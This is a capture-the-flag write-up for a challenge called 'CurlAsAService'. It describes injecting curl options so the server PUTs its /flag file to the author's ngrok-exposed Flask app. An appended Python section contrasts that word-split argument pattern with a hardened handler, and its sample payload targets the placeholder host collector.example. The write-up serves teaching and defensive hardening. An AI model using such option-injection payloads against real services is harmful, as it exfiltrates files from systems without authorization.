CurlAsAService
CHALLENGE DESCRIPTION
cURL As A Service or CAAS is a brand new Alien application, built so that humans can test the status of their websites. However, it seems that the Aliens have not quite got the hang of Human programming and the application is riddled with issues.
I approached the challenge as a black-box test.
Website
A simple curl request retrieves the frontend source code.
There are many ways to solve this challenge.
I will make a Flask app that handles PUT requests and tell curl to PUT the file to my app.
Flask app
After this, start ngrok on port 5000.
Run the app.py file.
Payload
Breakdown:
-X PUT : tells curl which HTTP method to use
-F "file=@/flag" : tells curl which file to upload (-F sends a multipart form field, and the @ prefix makes curl read that field's content from the named file)
Turn on Burp Suite and URL-encode the above payload.
pwned
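The payload works because the value submitted to the application reaches curl as extra command-line options. The following is an added example, not the challenge's source code or the author's Flask app: it assumes the service word-splits the submitted field into curl's argument list, and contrasts that with a handler that accepts only a single validated URL. The function names, the sample string and the `collector.example` host are constructed for illustration.

```python
import shlex
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample: the two options from the breakdown plus a placeholder URL.
SAMPLE = '-X PUT -F "file=@/flag" http://collector.example/'


def vulnerable_argv(user_input: str) -> list[str]:
    """Assumed weak pattern: the field is word-split straight into curl's argv."""
    return ["curl", *shlex.split(user_input)]


def safe_argv(user_input: str) -> list[str]:
    """Build a curl argv that carries exactly one validated http(s) URL."""
    # One argument only: whitespace or control characters mean extra words.
    if any(c.isspace() or ord(c) < 0x20 for c in user_input):
        raise ValueError("whitespace or control character in URL")
    parts = urlsplit(user_input)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("only absolute http(s) URLs are accepted")
    return [
        "curl", "--silent", "--max-time", "5",
        # Keep curl itself to http(s), including after redirects.
        "--proto", "=http,https", "--proto-redir", "=http,https",
        # "--" ends option parsing, so the URL can never be read as a flag.
        "--", user_input,
    ]


def is_accepted(user_input: str) -> bool:
    """True when safe_argv would pass the input on to curl."""
    try:
        safe_argv(user_input)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("weak   :", vulnerable_argv(SAMPLE))
    print("sample accepted by hardened handler:", is_accepted(SAMPLE))
    print("strict :", safe_argv("http://example.com/status"))
```

The argument list is meant to be passed to `subprocess.run` without `shell=True`, so no shell ever re-parses the URL.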